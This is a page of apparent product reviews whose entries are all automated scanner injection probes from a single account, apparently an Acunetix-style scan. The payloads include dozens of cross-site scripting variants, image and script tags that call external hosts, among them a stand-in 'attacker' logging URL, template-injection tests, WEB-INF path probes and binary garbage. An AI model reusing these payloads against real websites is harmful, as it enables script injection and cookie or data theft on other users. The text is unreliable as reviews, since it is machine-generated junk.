From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ifRAme sRc=980392.com></IfRamE>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
WEB-INF/web.xml
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
/\www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img sRc='http://attacker-907396/log.php?
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1'"()&%<acx><ScRiPt >prompt(902536)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
WEB-INF\web.xml
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
'"()&%<acx><ScRiPt >prompt(901015)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1_937349
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
/www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
905019
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
http://www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
acu3169<s1﹥s2ʺs3ʹuca3169
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
//www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
acux5684��z1��z2a�bcxuca5684
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
/\www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
{{9999697*10000337}}
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
/www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt >prompt(950999)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
927456
1
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<script>prompt(941178)</script>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
http://www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScR<ScRiPt>IpT>prompt(926077)</sCr<ScRiPt>IpT>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(998072)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955910></ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(988591)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<video><source onerror="javascript:prompt(979447)">
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
//www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<svg  

�onload=prompt(948549);>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1%3Csvg%20onload%3Dprompt(920749)%3E
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<isindex type=image src=1 onerror=prompt(931673)>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<div style=width:expression(prompt(932517))>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
/\www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='947060'>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<body onload=prompt(909713)>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(940856)>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=xyz OnErRor=prompt(911714)>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img/src=">" onerror=alert(980420)>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt%20>prompt(954169)</sCripT>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1\u003CScRiPt\u003Eprompt(931700)\u003C/sCripT\u003E
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1&lt;ScRiPt&gt;prompt(951336)&lt;/sCripT&gt;
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
�<img acu onmouseover=prompt(939750) //�>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<input autofocus onfocus=prompt(910287)>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=http://www.vulnweb.com></a>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=jaVaScRiPT:>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
[url=http://www.vulnweb.com][/url]
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img<!-- --> src=x onerror=alert(926185);//><!-- -->
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1}body{acu:Expre/**/SSion(prompt(995946))}
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<% contenteditable onresize=prompt(942879)>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1_v87t2
<ScRiPt >prompt(993406)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ifRAme sRc=927081.com></IfRamE>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img sRc='http://attacker-996497/log.php?
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1'"()&%<acx><ScRiPt >prompt(969500)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
'"()&%<acx><ScRiPt >prompt(973975)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
1_943344
From: yebglfyh | Date: 4/15/2016 10:25 PM
Was this review helpful? Yes No (0/0)
Mr.
acu8282<s1﹥s2ʺs3ʹuca8282
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
acux9987��z1��z2a�bcxuca9987
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
{{10000146*9999474}}
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt >prompt(910440)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<script>prompt(906614)</script>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScR<ScRiPt>IpT>prompt(942164)</sCr<ScRiPt>IpT>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(951366)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945673></ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(986965)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<video><source onerror="javascript:prompt(914346)">
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<svg  

�onload=prompt(927147);>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1%3Csvg%20onload%3Dprompt(932607)%3E
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<isindex type=image src=1 onerror=prompt(935501)>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<div style=width:expression(prompt(946397))>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='940909'>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<body onload=prompt(955381)>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985851)>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=xyz OnErRor=prompt(954060)>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img/src=">" onerror=alert(947250)>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt%20>prompt(979180)</sCripT>
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1\u003CScRiPt\u003Eprompt(958534)\u003C/sCripT\u003E
From: yebglfyh | Date: 4/15/2016 10:26 PM
Was this review helpful? Yes No (0/0)
Mr.
1&lt;ScRiPt&gt;prompt(914194)&lt;/sCripT&gt;
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
�<img acu onmouseover=prompt(991320) //�>
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
1<input autofocus onfocus=prompt(988060)>
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=http://www.vulnweb.com></a>
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=jaVaScRiPT:>
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
[url=http://www.vulnweb.com][/url]
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img<!-- --> src=x onerror=alert(918216);//><!-- -->
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
1}body{acu:Expre/**/SSion(prompt(902376))}
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
1<% contenteditable onresize=prompt(925047)>
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
1_E4WHn
<ScRiPt >prompt(979464)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ifRAme sRc=964639.com></IfRamE>
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img sRc='http://attacker-912806/log.php?
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.'"()&%<acx><ScRiPt >prompt(994718)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
'"()&%<acx><ScRiPt >prompt(932042)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr._908748
1
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
acu3573<s1﹥s2ʺs3ʹuca3573
1
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
acux1503��z1��z2a�bcxuca1503
1
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
{{9999597*9999618}}
1
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.<ScRiPt >prompt(920874)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:27 PM
Was this review helpful? Yes No (0/0)
Mr.<script>prompt(917062)</script>
1
From: yebglfyh | Date: 4/15/2016 10:28 PM
Was this review helpful? Yes No (0/0)
Mr.<ScR<ScRiPt>IpT>prompt(971408)</sCr<ScRiPt>IpT>
1
From: yebglfyh | Date: 4/15/2016 10:28 PM
Was this review helpful? Yes No (0/0)
Mr.<ScRiPt >prompt(919832)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:28 PM
Was this review helpful? Yes No (0/0)